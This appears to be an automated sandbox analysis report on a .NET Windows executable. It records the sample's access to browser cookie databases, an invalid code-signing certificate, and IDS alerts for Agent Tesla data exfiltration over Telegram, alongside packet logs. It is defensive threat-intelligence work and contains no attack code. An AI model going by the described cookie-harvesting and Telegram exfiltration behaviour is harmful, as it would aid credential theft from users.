Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sifnkltx.vfn\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sifnkltx.vfn\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite

Download File

Process:	C:\Users\user\Desktop\IUqsn1SBGy.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.572453331291594
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IUqsn1SBGy.exe
File size:	872'968 bytes
MD5:	dd800a9d42c8d41146c3f8f53ccd29f9
SHA1:	2c2b828705e4ddc314d3a9aee659baad7ca650bd
SHA256:	2e31bfbc51607f142e0413db74ced776bb207448c052b9363250d2b93e718431
SHA512:	f91712fe8b7a7382de0eb32e0d158be08d807c3868f164603ebbcff9595b74141624dd1c2e571cd4964c8bed018f0796a299a88f23fa70d86192c8367064c38b
SSDEEP:	24576:SMu2uO0l+nEXtAdU6xp8flT4zgS4v8PeT/SWmqmo:BuT3upikcS4UmT/Ao
TLSH:	EA05CFC03B25770ECD6DA830853ADCB8A2642E78B005B5E369DE3B9776FD1129A0DF51
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ubg..............0......B......N.... ........@.. .......................`............@................................

File Icon


Icon Hash:	4534735358606062

Static PE Info

General

Entrypoint:	0x4cf64e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6762759D [Wed Dec 18 07:11:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcf5f8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd0000	0x3ed0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd1c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcd654	0xcd800	1509f8100b690608f14750fdfdfc759e	False	0.8514246882603407	data	7.590852977086481	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd0000	0x3ed0	0x4000	879cfde773b9878c56e59c93f32f6e1e	False	0.4217529296875	data	5.130824275428851	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd4000	0xc	0x200	fc45e76195ec42273f3470a4ecf3fed6	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xd0178	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m	0.6409574468085106
RT_ICON	0xd05e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m	0.49671669793621015
RT_ICON	0xd1688	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m	0.4012448132780083
RT_GROUP_ICON	0xd3c30	0x30	data	0.8125
RT_GROUP_ICON	0xd3c60	0x14	data	1.05
RT_VERSION	0xd3c74	0x258	data	0.48833333333333334

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:53:49.085185+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:53:49.399733+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:53:49.399733+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49710	149.154.167.220	443	TCP
2025-01-10T16:53:49.400183+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49710	TCP
2025-01-10T16:53:50.536500+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49713	149.154.167.220	443	TCP
2025-01-10T16:53:50.799445+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49713	149.154.167.220	443	TCP
2025-01-10T16:53:50.799703+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49713	TCP
2025-01-10T16:54:02.166795+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:02.606511+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:02.606511+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49751	149.154.167.220	443	TCP
2025-01-10T16:54:02.606796+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49751	TCP
2025-01-10T16:54:03.605474+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49758	149.154.167.220	443	TCP
2025-01-10T16:54:04.026390+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49758	149.154.167.220	443	TCP
2025-01-10T16:54:04.026658+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49758	TCP
2025-01-10T16:54:09.897346+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:54:10.348475+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:54:10.348475+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49798	149.154.167.220	443	TCP
2025-01-10T16:54:10.349098+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49798	TCP
2025-01-10T16:54:11.357742+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49807	149.154.167.220	443	TCP
2025-01-10T16:54:11.696863+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49807	149.154.167.220	443	TCP
2025-01-10T16:54:11.697132+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49807	TCP
2025-01-10T16:55:31.979474+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T16:55:31.985710+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T16:55:33.713675+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49993	149.154.167.220	443	TCP
2025-01-10T16:55:33.718590+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49993	149.154.167.220	443	TCP
2025-01-10T16:55:51.221441+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T16:55:51.277076+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49995	149.154.167.220	443	TCP
2025-01-10T16:55:51.277876+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49995	149.154.167.220	443	TCP
2025-01-10T16:55:51.616707+0100	2851779	ETPRO MALWARE Agent Tesla Telegram Exfil	1	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T16:55:51.616707+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T16:55:51.616988+0100	2854281	ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound	1	149.154.167.220	443	192.168.2.5	49994	TCP
2025-01-10T16:55:55.641198+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T16:55:55.641973+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T16:55:56.254260+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49997	149.154.167.220	443	TCP
2025-01-10T16:55:56.255106+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49997	149.154.167.220	443	TCP
2025-01-10T16:55:57.668617+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T16:55:57.669492+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T16:56:00.765027+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49999	149.154.167.220	443	TCP
2025-01-10T16:56:00.768696+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	49999	149.154.167.220	443	TCP
2025-01-10T16:56:06.740775+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50001	149.154.167.220	443	TCP
2025-01-10T16:56:06.741705+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50001	149.154.167.220	443	TCP
2025-01-10T16:56:24.761956+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50003	149.154.167.220	443	TCP
2025-01-10T16:56:24.766261+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50003	149.154.167.220	443	TCP
2025-01-10T16:56:44.725630+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T16:56:44.734070+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T16:56:49.663504+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50005	149.154.167.220	443	TCP
2025-01-10T16:56:49.664545+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50005	149.154.167.220	443	TCP
2025-01-10T16:57:12.269674+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T16:57:12.270281+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T16:57:21.727426+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50007	149.154.167.220	443	TCP
2025-01-10T16:57:21.729875+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50007	149.154.167.220	443	TCP
2025-01-10T16:57:24.011143+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T16:57:24.011804+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T16:57:25.373764+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50009	149.154.167.220	443	TCP
2025-01-10T16:57:25.375197+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50009	149.154.167.220	443	TCP
2025-01-10T16:57:30.129619+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T16:57:30.130507+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T16:57:40.311733+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50011	149.154.167.220	443	TCP
2025-01-10T16:57:40.312509+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50011	149.154.167.220	443	TCP
2025-01-10T16:57:52.493800+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T16:57:52.494998+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T16:57:52.623163+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50013	149.154.167.220	443	TCP
2025-01-10T16:57:52.624134+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50013	149.154.167.220	443	TCP
2025-01-10T16:57:52.721560+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	50014	149.154.167.220	443	TCP
2025-01-10T16:57:52.722309+0100	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	1	192.168.2.5	50014	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:53:45.459337950 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:45.459373951 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:45.459445000 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:45.477323055 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:45.477338076 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:45.989803076 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:45.989890099 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:45.995207071 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:45.995217085 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:45.995656967 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:46.039398909 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:46.129179955 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:46.171334982 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:46.255796909 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:46.255881071 CET	443	49708	104.26.13.205	192.168.2.5
Jan 10, 2025 16:53:46.255928040 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:46.583656073 CET	49708	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:53:48.088037968 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.088071108 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:48.088135958 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.098220110 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.098241091 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:48.767862082 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:48.767937899 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.771801949 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.771817923 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:48.772443056 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:48.775039911 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:48.815335035 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.085180998 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.085452080 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.085479021 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.399754047 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.399857998 CET	443	49710	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.399909019 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.400298119 CET	49710	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.582693100 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.582773924 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:49.582855940 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.583179951 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:49.583194017 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.221654892 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.223362923 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:50.223387003 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.536514044 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.536760092 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:50.536787033 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.799477100 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.799585104 CET	443	49713	149.154.167.220	192.168.2.5
Jan 10, 2025 16:53:50.799706936 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:53:50.800245047 CET	49713	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:00.082302094 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.082355022 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.082515001 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.087619066 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.087637901 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.540925980 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.541012049 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.543481112 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.543493986 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.543751001 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.586260080 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.597307920 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.639334917 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.726155996 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.726238012 CET	443	49741	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:00.726316929 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:00.729186058 CET	49741	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:01.228276014 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.228313923 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:01.228609085 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.229155064 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.229167938 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:01.868952990 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:01.869169950 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.913619041 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.913654089 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:01.914005041 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:01.961272955 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:01.977401018 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.019334078 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.166810036 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.167120934 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.167134047 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.606594086 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.606698036 CET	443	49751	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.606776953 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.607197046 CET	49751	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.698343039 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.698380947 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:02.698468924 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.698779106 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:02.698791981 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:03.303680897 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:03.305398941 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:03.305438042 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:03.605494976 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:03.607688904 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:03.607738018 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:04.026472092 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:04.026563883 CET	443	49758	149.154.167.220	192.168.2.5
Jan 10, 2025 16:54:04.026623964 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:04.027069092 CET	49758	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:54:07.806763887 CET	49792	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:07.806849957 CET	443	49792	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:07.806936026 CET	49792	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:07.810034037 CET	49792	443	192.168.2.5	104.26.13.205
Jan 10, 2025 16:54:07.810086012 CET	443	49792	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:08.272680998 CET	443	49792	104.26.13.205	192.168.2.5
Jan 10, 2025 16:54:08.272749901 CET	49792	443	192.168.2.5	104.26.13.205
